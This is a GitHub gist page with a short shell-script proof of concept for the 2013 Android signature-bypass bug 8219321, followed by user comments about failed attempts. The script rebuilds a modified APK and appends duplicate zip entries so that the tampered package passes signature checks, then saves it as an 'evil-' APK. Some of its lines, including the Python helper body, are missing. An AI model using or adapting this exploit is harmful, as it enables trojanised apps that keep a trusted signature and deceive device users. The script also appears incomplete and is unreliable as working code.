You must be signed in to star a gist
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
|# PoC for Android bug 8219321 by @pof|
|# +info: https://jira.cyanogenmod.org/browse/CYAN-1602|
|if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi|
|rm -r out out.apk tmp 2>/dev/null|
|java -jar apktool.jar d $APK out|
|#apktool d $APK out|
|echo "Modify files, when done type 'exit'"|
|java -jar apktool.jar b out out.apk|
|#apktool b out out.apk|
|mv ../out.apk .|
|cat >poc.py <<-EOF|
|z = zipfile.ZipFile(sys.argv, "a")|
|chmod 755 poc.py|
|for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done|
|cp out.apk ../evil-$APK|
|rm -rf tmp out|
|echo "Modified APK: evil-$APK"|
Jul 22, 2013
here's an example that can inject contents of an APK into another:
Jul 27, 2013
@poliva Thanks! :)
Sep 4, 2013
I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.
Even with the old android, versions. Any idea on what am i missing?
Jun 16, 2016
@esotericnomen have you solved the problem ?
Jun 12, 2017
I have also met this problem.Is there any solutions?
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!